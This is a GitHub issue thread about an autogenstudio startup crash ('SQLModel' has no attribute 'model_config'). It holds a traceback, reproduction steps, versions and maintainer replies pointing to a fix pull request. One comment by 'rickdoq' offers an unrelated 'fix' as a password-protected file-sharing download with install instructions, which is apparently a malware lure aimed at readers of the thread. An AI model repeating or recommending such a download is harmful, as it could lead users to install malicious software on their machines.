### ISSUE TITLE
[Bug]: AttributeError: type object 'SQLModel' has no attribute 'model_config'

### ISSUE THREAD

**Issue by windowshopr** [microsoft/autogen#3455]
### Describe the bug

```
PS I:\nasty\Python_Projects\LLM\autogen\Studio> autogenstudio ui --database-uri sqlite:///database.sqlite
Traceback (most recent call last):
  File "<frozen runpy>", line 198, in _run_module_as_main
  File "<frozen runpy>", line 88, in _run_code
  File "C:\Users\chalu\AppData\Local\Programs\Python\Python311\Scripts\autogenstudio.exe\__main__.py", line 4, in <module>
  File "C:\Users\chalu\AppData\Local\Programs\Python\Python311\Lib\site-packages\autogenstudio\__init__.py", line 1, in <module>
    from .chatmanager import *
  File "C:\Users\chalu\AppData\Local\Programs\Python\Python311\Lib\site-packages\autogenstudio\chatmanager.py", line 10, in <module>
    from .datamodel import Message
  File "C:\Users\chalu\AppData\Local\Programs\Python\Python311\Lib\site-packages\autogenstudio\datamodel.py", line 19, in <module>
    SQLModel.model_config["protected_namespaces"] = ()
    ^^^^^^^^^^^^^^^^^^^^^
AttributeError: type object 'SQLModel' has no attribute 'model_config'
```

### Steps to reproduce

```
pip install -U autogenstudio
autogenstudio ui --database-uri sqlite:///database.sqlite
```

### Additional Information

Windows 10
Python 3.11.0
autogenstudio==0.1.5
sqlmodel==0.0.21

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by victordibia** [comment]
Looks like this might be a compatibility issue related to python 3.11 and the latest version of sqlmodel. (I have 3.10 and sqlmodel 0.0.16) which seems to have no issues.
Anyone interested in investigating and suggesting a PR/fix?

**Comment by Hk669** [comment]
@windowshopr help us review the fix at https://github.com/microsoft/autogen/pull/3457. thanks

**Comment by windowshopr** [comment]
Good, however it results in a new error on my side. I will open a new issue for it.

#3463
